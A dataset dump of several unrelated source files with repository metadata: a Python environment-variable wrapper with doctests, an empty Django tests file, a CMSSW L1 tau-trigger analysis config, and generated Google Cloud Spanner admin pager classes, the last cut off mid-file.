        elif lower in ('y', 'yes', 'true'):
            result = True
        elif lower in ('n', 'no', 'false'):
            result = False
        elif self:
            # Non-empty but not recognizable as a boolean.
            raise ValueError(f'{self!r} is not a valid value for truthy().')
        return result

    @property
    def bool(self):
        ''' Return a bool. '''
        return bool(self)

    @property
    def float(self):
        ''' Return a float. '''
        return float(self)

    @property
    def int(self):
        ''' Return an int. '''
        return int(self)

    @property
    def list(self):
        ''' Split a path string (defaults to os.pathsep) and return list.

            Use str.split instead when a custom delimiter is needed.
        '''
        return self.split(self._pathsep)

    @property
    def path(self):
        ''' Return a path string as a Path object. '''
        from pathlib import Path
        return Path(self)

    @property
    def path_list(self):
        ''' Return list of Path objects. '''
        from pathlib import Path
        return [ Path(pathstr) for pathstr in self.split(self._pathsep) ]

    @property
    def from_json(self):
        ''' Parse a JSON string. '''
        from json import loads
        return loads(self)

    def __repr__(self):
        return '%s(%r, %r)' % (self.__class__.__name__, self.name, self.value)


class NullEntry(EnvironmentVariable):
    ''' Represents an non-existent entry in the environment.

        This is a None-like convenience object that won't throw AttributeError
        on attribute lookups.  Attributes are instead returned as "falsey"
        numeric zero or empty string/containers.
    '''
    def __new__(cls, name):
        return str.__new__(cls, '')  # Py2/3

    def __init__(self, name):
        self.name = name
        self.value = None

    def __bool__(self):
        return False

    @property
    def truthy(self):
        # value is always None for a NullEntry, so this returns None.
        return None if (self.value is None) else False

    @property
    def bool(self):
        return False

    @property
    def float(self):
        return 0.0

    @property
    def int(self):
        return 0

    @property
    def list(self):
        return []

    @property
    def path(self):
        return None

    @property
    def path_list(self):
        return []

    @property
    def from_json(self):
        return {}

    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self.name)
class Environment(MutableMapping):
    ''' A mapping object that presents a simplified view of the OS Environment.

        Variables are exposed both as mapping items and as attributes; a
        missing variable yields a NullEntry instead of raising.
    '''
    _Entry_class = Entry  # save for Python2 compatibility :-/
    _NullEntry_class = NullEntry

    def __init__(self, environ=os.environ,
                       sensitive=False if os.name == 'nt' else True,
                       writable=False,
                ):
        # setobj - prevents infinite recursion due to custom setattr
        # https://stackoverflow.com/a/16237698/450917
        setobj = object.__setattr__
        setobj(self, '_original_env', environ)
        setobj(self, '_sensitive', sensitive)
        setobj(self, '_writable', writable)
        if sensitive:
            setobj(self, '_envars', environ)
        else:
            # Case-insensitive view: fold every name to lower case.
            setobj(self, '_envars', { name.lower(): value
                                      for name, value in environ.items() })

    def __contains__(self, name):
        return name in self._envars

    def __getattr__(self, name):
        ''' Customize attribute access, allow direct access to variables. '''
        # need a loophole for configuring a new instance
        if name == 'Environment':
            return Environment
        elif name == 'Entry':
            return Entry or self._Entry_class  # Py2 compat

        if not self._sensitive:
            name = name.lower()
        try:
            return self._Entry_class(name, self._envars[name])
        except KeyError:
            return self._NullEntry_class(name)

    def __setattr__(self, name, value):
        if self._writable:
            self._envars[name] = value
            if self._original_env is os.environ:  # push to environment
                os.environ[name] = value
        else:
            raise AttributeError('This Environment is read-only.')

    def __delattr__(self, name):
        del self._envars[name]

    # MutableMapping needs these implemented, defers to internal dict
    def __len__(self):
        return len(self._envars)

    def __delitem__(self, key):
        del self._envars[key]

    def __getitem__(self, key):
        return self._envars[key]

    def __setitem__(self, key, item):
        # BUG FIX: previously wrote to self.data, an attribute that never
        # exists on Environment, so item assignment misbehaved/failed.
        # NOTE(review): unlike __setattr__, this does not honour _writable
        # or push to os.environ -- kept minimal; confirm desired semantics.
        self._envars[key] = item

    def __iter__(self):
        return iter(self._envars)

    def __repr__(self):
        entry_list = ', '.join([ ('%s=%r' % (k, v)) for k, v in self.items() ])
        return '%s(%s)' % (self.__class__.__name__, entry_list)

    def from_prefix(self, prefix, lowercase=True, strip=True):
        ''' Returns a dictionary of keys with the same prefix.
            Compat with kr/env, lowercased.

                > xdg = env.from_prefix('XDG_')
                > for key, value in xdg.items():
                      print('%-20s' % key, value[:6], '…')

                config_dirs          /etc/x…
                current_desktop      MATE
                data_dirs            /usr/s…
                …
        '''
        # NOTE(review): with strip=False no keys are ever copied into the
        # subset below -- looks unintended; confirm before relying on it.
        env_subset = {}
        for key in self._envars.keys():
            if key.startswith(prefix):
                if strip:  # cut prefix
                    new_key = key[len(prefix):]
                    new_key = new_key.lower() if lowercase else new_key
                    env_subset[new_key] = self._envars[key]

        return Environment(
            environ=env_subset,
            sensitive=self._sensitive,
            writable=self._writable,
        )
    prefix = from_prefix  # kr/env-compatible alias

    def map(self, **kwargs):
        ''' Change a name on the fly. Compat with kr/env. '''
        return { key: self._envars[kwargs[key]]  # str strips Entry
                 for key in kwargs }
if __name__ == '__main__':

    # keep tests close
    # Fixture environment used by the doctests appended below.
    testenv = dict(
        EMPTY='',
        JSON_DATA='{"one":1, "two":2, "three":3}',
        PI='3.1416',
        READY='no',
        PORT='5150',
        QT_ACCESSIBILITY='1',
        SSH_AUTH_SOCK='/run/user/1000/keyring/ssh',
        TERM='xterm-256color',
        USER='fred',
        XDG_DATA_DIRS='/usr/local/share:/usr/share',
        XDG_SESSION_ID='c1',
        XDG_SESSION_TYPE='x11',
    )
    # Appended to the module docstring so doctest.testmod() picks it up.
    __doc__ += '''
    Default::

        >>> env = Environment(testenv, sensitive=True, writable=True)

        >>> env.USER                            # exists, repr
        Entry('USER', 'fred')

        >>> str(env.USER)                       # exists, str
        'fred'

        >>> env.USER + '_suffix'                # str ops
        'fred_suffix'

        >>> env.USER.title()                    # str ops II
        'Fred'

        >>> bool(env.USER)                      # check exists/not empty
        True

        >>> print(f'term: {env.TERM}')          # via interpolation
        term: xterm-256color

        >>> 'NO_EXISTO' in env                  # check existence, DNE
        False

        >>> env.NO_EXISTO or 'default'          # DNE with default
        'default'

        >>> env.NO_EXISTO                       # var DNE repr
        NullEntry('NO_EXISTO')

        >>> env.NO_EXISTO.value is None         # check existence II
        True

        >>> bool(env.NO_EXISTO)                 # check when DNE: False
        False

        >>> 'EMPTY' in env                      # check existence
        True

        >>> env.EMPTY                           # exists but empty
        Entry('EMPTY', '')

        >>> env.EMPTY.value is None             # check existence II
        False

        >>> bool(env.EMPTY)                     # check when empty: False
        False

        >>> env.EMPTY or 'default'              # exists, blank w/ def.
        'default'

        >>> key_name = 'PI'
        >>> env[key_name]                       # getitem syntax
        '3.1416'

        >>> env.PI.float                        # type conversion
        3.1416

        >>> env.PORT.int or 9000                # type conv. w/ default
        5150

        >>> env.QT_ACCESSIBILITY.truthy         # 0/1/yes/no/true/false
        True

        >>> sorted(env.JSON_DATA.from_json.keys())  # sorted: compat < 3.6
        ['one', 'three', 'two']

        >>> env.XDG_DATA_DIRS.list
        ['/usr/local/share', '/usr/share']

        >>> env.XDG_DATA_DIRZ.list              # DNE fallback
        []

        # using isinstance to avoid Platform errs:
        >>> from pathlib import Path
        >>> isinstance(env.SSH_AUTH_SOCK.path, Path)
        True

        >>> all(map(lambda p: isinstance(p, Path), env.XDG_DATA_DIRS.path_list))
        True

    KR/env compatibility::

        >>> sorted(env.prefix('XDG_', False).keys())
        ['DATA_DIRS', 'SESSION_ID', 'SESSION_TYPE']

        >>> sorted(env.prefix('XDG_', False).values())
        ['/usr/local/share:/usr/share', 'c1', 'x11']

        >>> env.map(username='USER')
        {'username': 'fred'}

    Writing is possible when writable is set to True (see above),
    though not exceedingly useful::

        >>> env.READY
        Entry('READY', 'no')

        >>> env.READY = 'yes'
        >>> env.READY
        Entry('READY', 'yes')

    Unicode test::

        >>> env.MÖTLEY = 'Crüe'
        >>> env.MÖTLEY
        Entry('MÖTLEY', 'Crüe')

    Sensitive False::

        >>> env = Environment(testenv, sensitive=False)
        >>> str(env.USER)                       # interactive repr
        'fred'
        >>> str(env.user)                       # interactive repr
        'fred'
    '''
    import doctest
    # testmod returns (failure_count, test_count):
    # pass -v on the command line for verbose doctest output.
    sys.exit(
        doctest.testmod(verbose=(True if '-v' in sys.argv else False))[0]
    )
else:
    # save original module for later, just in case it's needed.
    Environment._module = sys.modules[__name__]

    # Wrap module with instance for direct access
    sys.modules[__name__] = Environment()
| [
"cyberflameu@gmail.com"
] | cyberflameu@gmail.com |
f837ebf1b3fa78de1bf4edf422f8a338625f4bb3 | d9b8fce973a6c4f1d20e0fb09840a3d54473e8b4 | /end/project/bookdemo/booktest/tests.py | 3b33c04714da1fc19d5512db71ee5544038e719a | [] | no_license | pm0303/pmgit | 157c4c46f733327e3d87b4f13b7ee865ee0637d8 | 92de118cbabbba6c6c03b5e1494c9c46e439f13c | refs/heads/master | 2021-01-02T02:02:14.511468 | 2020-02-26T09:45:23 | 2020-02-26T09:45:23 | 239,445,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | from django.test import TestCase
# Create your tests here.
# Unit-test module; no tests are needed for now.
"2641938505@qq.com"
] | 2641938505@qq.com |
d7f6722540037a29c7c6722f0fca5d042b7c0552 | 45d6b7739ef7e61779d778b16e2d2cb9b92a08c0 | /test/run_in_parallel-200PU-grow/SUB-Analyzer-44.py | 153296b77ea28b2b6bcea87c4d79a9a5af001630 | [] | no_license | isobelojalvo/phase2L1TauAnalyzer | 40b545baec97bf287a8d8ab26bea70546bf9f6f8 | 98ef6d31a523698ba0de48763cadee1d5b2ce695 | refs/heads/master | 2021-01-22T08:38:17.965156 | 2019-07-25T17:25:51 | 2019-07-25T17:25:51 | 92,623,686 | 0 | 1 | null | 2019-07-23T19:43:55 | 2017-05-27T20:56:25 | Python | UTF-8 | Python | false | false | 6,667 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: step2 --python_filename=rerun_step2_L1_onMCL1_FEVTHLTDEBUG.py --no_exec -s L1 --datatier GEN-SIM-DIGI-RAW -n 1 --era Phase2_timing --eventcontent FEVTDEBUGHLT --filein file:/afs/cern.ch/user/r/rekovic/release/CMSSW_9_3_2/src/step2_DIGI_PU200_10ev.root --conditions 93X_upgrade2023_realistic_v2 --beamspot HLLHC14TeV --geometry Extended2023D17 --fileout file:step2_ZEE_PU200_1ev_rerun-L1-L1Ntuple.root --customise=L1Trigger/L1TNtuples/customiseL1Ntuple.L1NtupleEMU
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras

# L1-trigger re-emulation job over Phase-2 (2023D17, 200 PU) RelVal ZTT
# input, followed by the phase-2 L1 PF-tau producer and analyzer.
process = cms.Process('L1',eras.Phase2_trigger)

# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.Geometry.GeometryExtended2023D17Reco_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
process.load('Configuration.StandardSequences.SimL1Emulator_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('L1Trigger.TrackFindingTracklet.L1TrackletTracks_cff')

# NOTE: overridden to 100 in the template section at the bottom of the file.
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(4000)
)

# Input source
# NOTE: fileNames, secondaryFileNames and lumisToProcess set here are all
# re-assigned near the bottom of the file; the later assignments win.
process.source = cms.Source("PoolSource",
    fileNames = cms.untracked.vstring(
        "root://cmsxrootd.fnal.gov///store/relval/CMSSW_9_3_7/RelValZTT_14TeV/MINIAODSIM/PU25ns_93X_upgrade2023_realistic_v5_2023D17PU200-v1/10000/6CE39BE9-EA2D-E811-8FDA-0242AC130002.root"
    ),
    # Drop the input's trigger products -- presumably so they can be
    # re-emulated by this job without product clashes; confirm.
    inputCommands = cms.untracked.vstring("keep *",
        "drop l1tHGCalTowerMapBXVector_hgcalTriggerPrimitiveDigiProducer_towerMap_HLT",
        "drop l1tEMTFHit2016Extras_simEmtfDigis_CSC_HLT",
        "drop l1tEMTFHit2016Extras_simEmtfDigis_RPC_HLT",
        "drop l1tEMTFHit2016s_simEmtfDigis__HLT",
        "drop l1tEMTFTrack2016Extras_simEmtfDigis__HLT",
        "drop l1tEMTFTrack2016s_simEmtfDigis__HLT")
    #skipEvents = cms.untracked.uint32(80)
)

process.source.secondaryFileNames = cms.untracked.vstring(
    "/store/relval/CMSSW_9_3_7/RelValZTT_14TeV/GEN-SIM-DIGI-RAW/PU25ns_93X_upgrade2023_realistic_v5_2023D17PU200-v1/10000/FC056F35-2E2D-E811-BE3A-0242AC130002.root")
process.source.lumisToProcess = cms.untracked.VLuminosityBlockRange("1:46")

process.options = cms.untracked.PSet(

)

# Production Info
process.configurationMetadata = cms.untracked.PSet(
    annotation = cms.untracked.string('step2 nevts:1'),
    name = cms.untracked.string('Applications'),
    version = cms.untracked.string('$Revision: 1.19 $')
)

# Output definition
process.FEVTDEBUGHLToutput = cms.OutputModule("PoolOutputModule",
    dataset = cms.untracked.PSet(
        dataTier = cms.untracked.string('GEN-SIM-DIGI-RAW'),
        filterName = cms.untracked.string('')
    ),
    fileName = cms.untracked.string('file:test_reprocess.root'),
    splitLevel = cms.untracked.int32(0)
)

# Additional output definition

# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '100X_upgrade2023_realistic_v1', '')

# Re-make calorimeter trigger primitives (HCAL, HGCal, EB) and L1 tracks.
process.load('SimCalorimetry.HcalTrigPrimProducers.hcaltpdigi_cff')
process.load('CalibCalorimetry.CaloTPG.CaloTPGTranscoder_cfi')

process.load('L1Trigger.L1THGCal.hgcalTriggerPrimitives_cff')
process.hgcl1tpg_step = cms.Path(process.hgcalTriggerPrimitives)

process.load('SimCalorimetry.EcalEBTrigPrimProducers.ecalEBTriggerPrimitiveDigis_cff')
process.EcalEBtp_step = cms.Path(process.simEcalEBTriggerPrimitiveDigis)

process.L1TrackTrigger_step = cms.Path(process.L1TrackletTracksWithAssociators)
process.VertexProducer.l1TracksInputTag = cms.InputTag("TTTracksFromTracklet", "Level1TTTracks")

# Path and EndPath definitions
process.L1simulation_step = cms.Path(process.SimL1Emulator)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.FEVTDEBUGHLToutput_step = cms.EndPath(process.FEVTDEBUGHLToutput)

############################################################
# L1 pf object
###########################################################
process.load("L1Trigger.Phase2L1ParticleFlow.pfTracksFromL1Tracks_cfi")
from L1Trigger.Phase2L1ParticleFlow.l1ParticleFlow_cff import *
process.l1pf = cms.Path(process.pfTracksFromL1Tracks+process.l1ParticleFlow)

############################################################
# L1 Tau object
############################################################
process.load("L1Trigger.Phase2L1Taus.L1PFTauProducer_cff")
process.L1PFTauProducer.min_pi0pt = cms.double(2.5);
process.L1PFTauProducer.L1PFObjects = cms.InputTag("l1pfProducer","PF")
process.L1PFTauProducer.L1Neutrals = cms.InputTag("l1pfProducer")
process.L1PFTauProducer.L1Clusters = cms.InputTag("l1pfProducer","PF")
process.L1PFTaus = cms.Path(process.L1PFTauProducer)

# L1 Tau Analyzer
process.load("L1Trigger.phase2L1TauAnalyzer.phase2L1TauAnalyzer_cfi")
process.analyzer = cms.Path(process.L1TauAnalyzer)

# NOTE: this TFileService is replaced again in the template section below.
process.TFileService = cms.Service("TFileService",
    fileName = cms.string("analyzer-grow-l1t.root"),
    closeFileFast = cms.untracked.bool(True)
)

# Schedule definition
process.schedule = cms.Schedule(process.EcalEBtp_step,process.L1TrackTrigger_step,process.L1simulation_step,process.l1pf,process.L1PFTaus,process.analyzer,process.endjob_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)

# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion
#dump_file = open('dump.py','w')
#dump_file.write(process.dumpPython())

# ---- template overrides: these replace the equivalent settings above ----
process.source.secondaryFileNames = cms.untracked.vstring(
    "/store/relval/CMSSW_9_3_7/RelValZTT_14TeV/GEN-SIM-DIGI-RAW/PU25ns_93X_upgrade2023_realistic_v5_2023D17PU200-v1/10000/76A6C136-2E2D-E811-AA99-0242AC130002.root")
process.source.lumisToProcess = cms.untracked.VLuminosityBlockRange("1:48")

process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(100))

# Input source
# NOTE(review): $inputFileNames / $outputFileName are substitution
# placeholders for a job-submission tool, so this file is a template and
# not directly runnable Python -- confirm which tool does the substitution.
process.source.fileNames = cms.untracked.vstring($inputFileNames)

process.TFileService = cms.Service("TFileService",
    fileName = cms.string("$outputFileName")
)
| [
"ojalvo@wisc.edu"
] | ojalvo@wisc.edu |
53f1e2f513a9735af030b686847f828c7d25a6f9 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/spanner/admin/database/v1/admin-database-v1-py/google/cloud/spanner_admin_database_v1/services/database_admin/pagers.py | 77fee41bb742a42304fa72cb45903814dd541b52 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,767 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.spanner_admin_database_v1.types import backup
from google.cloud.spanner_admin_database_v1.types import spanner_database_admin
from google.longrunning import operations_pb2 as operations # type: ignore
class ListDatabasesPager:
    """Synchronous pager for the results of a ``list_databases`` call.

    Wraps an initial
    :class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse`
    and makes the pager itself iterable over the ``databases`` field,
    transparently issuing further ``ListDatabases`` requests whenever the
    current page carries a continuation token.  Attribute access is
    delegated to the most recently fetched response.
    """

    def __init__(self,
            method: Callable[..., spanner_database_admin.ListDatabasesResponse],
            request: spanner_database_admin.ListDatabasesRequest,
            response: spanner_database_admin.ListDatabasesResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The API method that was originally called and
                that is re-invoked to fetch subsequent pages.
            request (google.cloud.spanner_admin_database_v1.types.ListDatabasesRequest):
                The initial request object.
            response (google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse):
                The first page of results.
            metadata (Sequence[Tuple[str, str]]): Strings sent along with
                every follow-up request as metadata.
        """
        self._method = method
        self._request = spanner_database_admin.ListDatabasesRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Anything not defined on the pager is looked up on the latest page.
        return getattr(self._response, name)

    @property
    def pages(self) -> Iterable[spanner_database_admin.ListDatabasesResponse]:
        # Emit the page we already hold, then keep fetching for as long as
        # the service reports a continuation token.
        page = self._response
        yield page
        while page.next_page_token:
            self._request.page_token = page.next_page_token
            page = self._method(self._request, metadata=self._metadata)
            self._response = page
            yield page

    def __iter__(self) -> Iterable[spanner_database_admin.Database]:
        return (item for page in self.pages for item in page.databases)

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListDatabasesAsyncPager:
    """Asynchronous pager for the results of a ``list_databases`` call.

    Same contract as the synchronous pager, but exposed through
    ``__aiter__``: iterating the pager yields every ``databases`` entry,
    awaiting additional ``ListDatabases`` requests while a continuation
    token is present.  Attribute access is delegated to the most recently
    fetched response.
    """

    def __init__(self,
            method: Callable[..., Awaitable[spanner_database_admin.ListDatabasesResponse]],
            request: spanner_database_admin.ListDatabasesRequest,
            response: spanner_database_admin.ListDatabasesResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The awaitable API method originally called,
                re-invoked to fetch subsequent pages.
            request (google.cloud.spanner_admin_database_v1.types.ListDatabasesRequest):
                The initial request object.
            response (google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse):
                The first page of results.
            metadata (Sequence[Tuple[str, str]]): Strings sent along with
                every follow-up request as metadata.
        """
        self._method = method
        self._request = spanner_database_admin.ListDatabasesRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Anything not defined on the pager is looked up on the latest page.
        return getattr(self._response, name)

    @property
    async def pages(self) -> AsyncIterable[spanner_database_admin.ListDatabasesResponse]:
        # Emit the page we already hold, then keep fetching for as long as
        # the service reports a continuation token.
        page = self._response
        yield page
        while page.next_page_token:
            self._request.page_token = page.next_page_token
            page = await self._method(self._request, metadata=self._metadata)
            self._response = page
            yield page

    def __aiter__(self) -> AsyncIterable[spanner_database_admin.Database]:
        async def _flatten():
            async for page in self.pages:
                for item in page.databases:
                    yield item
        return _flatten()

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListBackupsPager:
    """Synchronous pager for the results of a ``list_backups`` call.

    Wraps an initial
    :class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse`
    and makes the pager itself iterable over the ``backups`` field,
    transparently issuing further ``ListBackups`` requests whenever the
    current page carries a continuation token.  Attribute access is
    delegated to the most recently fetched response.
    """

    def __init__(self,
            method: Callable[..., backup.ListBackupsResponse],
            request: backup.ListBackupsRequest,
            response: backup.ListBackupsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The API method that was originally called and
                that is re-invoked to fetch subsequent pages.
            request (google.cloud.spanner_admin_database_v1.types.ListBackupsRequest):
                The initial request object.
            response (google.cloud.spanner_admin_database_v1.types.ListBackupsResponse):
                The first page of results.
            metadata (Sequence[Tuple[str, str]]): Strings sent along with
                every follow-up request as metadata.
        """
        self._method = method
        self._request = backup.ListBackupsRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Anything not defined on the pager is looked up on the latest page.
        return getattr(self._response, name)

    @property
    def pages(self) -> Iterable[backup.ListBackupsResponse]:
        # Emit the page we already hold, then keep fetching for as long as
        # the service reports a continuation token.
        page = self._response
        yield page
        while page.next_page_token:
            self._request.page_token = page.next_page_token
            page = self._method(self._request, metadata=self._metadata)
            self._response = page
            yield page

    def __iter__(self) -> Iterable[backup.Backup]:
        return (item for page in self.pages for item in page.backups)

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListBackupsAsyncPager:
    """Asynchronous pager for the results of a ``list_backups`` call.

    Same contract as the synchronous pager, but exposed through
    ``__aiter__``: iterating the pager yields every ``backups`` entry,
    awaiting additional ``ListBackups`` requests while a continuation
    token is present.  Attribute access is delegated to the most recently
    fetched response.
    """

    def __init__(self,
            method: Callable[..., Awaitable[backup.ListBackupsResponse]],
            request: backup.ListBackupsRequest,
            response: backup.ListBackupsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The awaitable API method originally called,
                re-invoked to fetch subsequent pages.
            request (google.cloud.spanner_admin_database_v1.types.ListBackupsRequest):
                The initial request object.
            response (google.cloud.spanner_admin_database_v1.types.ListBackupsResponse):
                The first page of results.
            metadata (Sequence[Tuple[str, str]]): Strings sent along with
                every follow-up request as metadata.
        """
        self._method = method
        self._request = backup.ListBackupsRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Anything not defined on the pager is looked up on the latest page.
        return getattr(self._response, name)

    @property
    async def pages(self) -> AsyncIterable[backup.ListBackupsResponse]:
        # Emit the page we already hold, then keep fetching for as long as
        # the service reports a continuation token.
        page = self._response
        yield page
        while page.next_page_token:
            self._request.page_token = page.next_page_token
            page = await self._method(self._request, metadata=self._metadata)
            self._response = page
            yield page

    def __aiter__(self) -> AsyncIterable[backup.Backup]:
        async def _flatten():
            async for page in self.pages:
                for item in page.backups:
                    yield item
        return _flatten()

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListDatabaseOperationsPager:
    """Synchronous pager for the results of a ``list_database_operations`` call.

    Wraps an initial
    :class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse`
    and makes the pager itself iterable over the ``operations`` field,
    transparently issuing further ``ListDatabaseOperations`` requests
    whenever the current page carries a continuation token.  Attribute
    access is delegated to the most recently fetched response.
    """

    def __init__(self,
            method: Callable[..., spanner_database_admin.ListDatabaseOperationsResponse],
            request: spanner_database_admin.ListDatabaseOperationsRequest,
            response: spanner_database_admin.ListDatabaseOperationsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The API method that was originally called and
                that is re-invoked to fetch subsequent pages.
            request (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsRequest):
                The initial request object.
            response (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse):
                The first page of results.
            metadata (Sequence[Tuple[str, str]]): Strings sent along with
                every follow-up request as metadata.
        """
        self._method = method
        self._request = spanner_database_admin.ListDatabaseOperationsRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Anything not defined on the pager is looked up on the latest page.
        return getattr(self._response, name)

    @property
    def pages(self) -> Iterable[spanner_database_admin.ListDatabaseOperationsResponse]:
        # Emit the page we already hold, then keep fetching for as long as
        # the service reports a continuation token.
        page = self._response
        yield page
        while page.next_page_token:
            self._request.page_token = page.next_page_token
            page = self._method(self._request, metadata=self._metadata)
            self._response = page
            yield page

    def __iter__(self) -> Iterable[operations.Operation]:
        return (item for page in self.pages for item in page.operations)

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListDatabaseOperationsAsyncPager:
    """Asynchronous pager for the results of a ``list_database_operations`` call.

    Same contract as the synchronous pager, but exposed through
    ``__aiter__``: iterating the pager yields every ``operations`` entry,
    awaiting additional ``ListDatabaseOperations`` requests while a
    continuation token is present.  Attribute access is delegated to the
    most recently fetched response.
    """

    def __init__(self,
            method: Callable[..., Awaitable[spanner_database_admin.ListDatabaseOperationsResponse]],
            request: spanner_database_admin.ListDatabaseOperationsRequest,
            response: spanner_database_admin.ListDatabaseOperationsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The awaitable API method originally called,
                re-invoked to fetch subsequent pages.
            request (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsRequest):
                The initial request object.
            response (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse):
                The first page of results.
            metadata (Sequence[Tuple[str, str]]): Strings sent along with
                every follow-up request as metadata.
        """
        self._method = method
        self._request = spanner_database_admin.ListDatabaseOperationsRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Anything not defined on the pager is looked up on the latest page.
        return getattr(self._response, name)

    @property
    async def pages(self) -> AsyncIterable[spanner_database_admin.ListDatabaseOperationsResponse]:
        # Emit the page we already hold, then keep fetching for as long as
        # the service reports a continuation token.
        page = self._response
        yield page
        while page.next_page_token:
            self._request.page_token = page.next_page_token
            page = await self._method(self._request, metadata=self._metadata)
            self._response = page
            yield page

    def __aiter__(self) -> AsyncIterable[operations.Operation]:
        async def _flatten():
            async for page in self.pages:
                for item in page.operations:
                    yield item
        return _flatten()

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListBackupOperationsPager:
    """Synchronous pager for the results of a ``list_backup_operations`` call.

    Wraps an initial
    :class:`google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse`
    and makes the pager itself iterable over the ``operations`` field,
    transparently issuing further ``ListBackupOperations`` requests
    whenever the current page carries a continuation token.  Attribute
    access is delegated to the most recently fetched response.
    """

    def __init__(self,
            method: Callable[..., backup.ListBackupOperationsResponse],
            request: backup.ListBackupOperationsRequest,
            response: backup.ListBackupOperationsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The API method that was originally called and
                that is re-invoked to fetch subsequent pages.
            request (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsRequest):
                The initial request object.
            response (google.cloud.spanner_admin_database_v1.types.ListBackupOperationsResponse):
                The first page of results.
            metadata (Sequence[Tuple[str, str]]): Strings sent along with
                every follow-up request as metadata.
        """
        self._method = method
        self._request = backup.ListBackupOperationsRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Anything not defined on the pager is looked up on the latest page.
        return getattr(self._response, name)

    @property
    def pages(self) -> Iterable[backup.ListBackupOperationsResponse]:
        # Emit the page we already hold, then keep fetching for as long as
        # the service reports a continuation token.
        page = self._response
        yield page
        while page.next_page_token:
            self._request.page_token = page.next_page_token
            page = self._method(self._request, metadata=self._metadata)
            self._response = page
            yield page

    def __iter__(self) -> Iterable[operations.Operation]:
        return (item for page in self.pages for item in page.operations)

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListBackupOperationsAsyncPager:
    """Asynchronous pager for the results of a ``list_backup_operations`` call.

    Same contract as the synchronous pager, but exposed through
    ``__aiter__``: iterating the pager yields every ``operations`` entry,
    awaiting additional ``ListBackupOperations`` requests while a
